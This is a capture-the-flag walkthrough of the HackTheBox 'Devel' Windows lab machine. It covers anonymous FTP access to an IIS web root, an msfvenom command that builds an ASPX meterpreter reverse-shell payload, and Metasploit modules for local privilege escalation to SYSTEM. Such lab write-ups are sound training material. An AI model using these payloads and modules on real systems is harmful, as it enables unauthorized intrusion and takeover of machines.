211 words
1 minutes
HackTheBox Devel
2020-05-24
2024-05-24
Walkthrough
Hackthebox
/
Easy
/
Windows

Summary#

Devel is an easy windows machine from hackthebox explains the risk of misconfiguration of ftp configurations. this machine can be compromised by using the metasploit framework

Inital Enumeration#

Upon enumerating the full ports and services observed that only 2 ports are open for this machine, which are

  • 21 - FTP ( running microsoft ftpd with anonymous login enabled )
  • 80 - HTTP ( running microsoft iis webserver of version 7.5 )

Devel Nmap

Foothold#

From the nmap result observed that the Annonymous login is enabled, using the ftp command login into the FTP Server using the following creds

Terminal window
ftp 10.10.10.5

FTP-Anonymous access

From the ftp service observed that the path is misconfigured and listed all the IIS webserver contents with read and write privielge into the directory

Using MSFvenom create an aspx payload and upload into the FTP directory

Terminal window
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx -o cmd.aspx

ASPX Payload Generation

Launch the metasploit framework and use the multi/handler module to setup the meterpreter listner

MSF Console

From the webserver trigger the cmd.aspx shell and we will get the revershell on the msfconsole

Meterpreter Shell

Priviege Escalation#

Once the shell as is obtained use the inbuilt privielge escalation module of MSF Console to recon the Local PE Exploits

Terminal window
use post/multi/recon/local_exploit_suggester

alt text

from the suggested exploit here we used the following one to do the privielge escalation and obtained the SYSTEM shell

Terminal window
windows/local/ms13_053_schlamperei

alt text

HackTheBox Devel
https://blog.0xdhinu.com/posts/devel-hackthebox/
Author
Dhinu Ramachandran
Published at
2020-05-24
License
CC BY-NC-SA 4.0
HackTheBox Legacy
HackTheBox Lame
contact@0xdhinu.com

© 2025 Dhinu Ramachandran. All Rights Reserved.